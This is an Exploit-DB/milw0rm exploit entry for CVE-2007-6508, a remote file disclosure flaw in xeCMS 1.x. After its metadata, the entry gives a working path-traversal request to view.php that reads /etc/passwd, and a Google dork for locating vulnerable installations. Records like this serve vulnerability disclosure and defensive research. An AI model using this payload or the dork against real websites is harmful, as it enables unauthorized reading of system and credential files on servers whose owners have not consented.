xeCMS 1.x - 'view.php' Remote File Disclosure

Author: p4imi0
type: webapps
platform: php
port: 
date_added: 2007-12-18 
date_updated: 2016-12-07 
verified: 1 
codes: OSVDB-44555;CVE-2007-6508 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comxeCMS-RC2.7z

--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-19]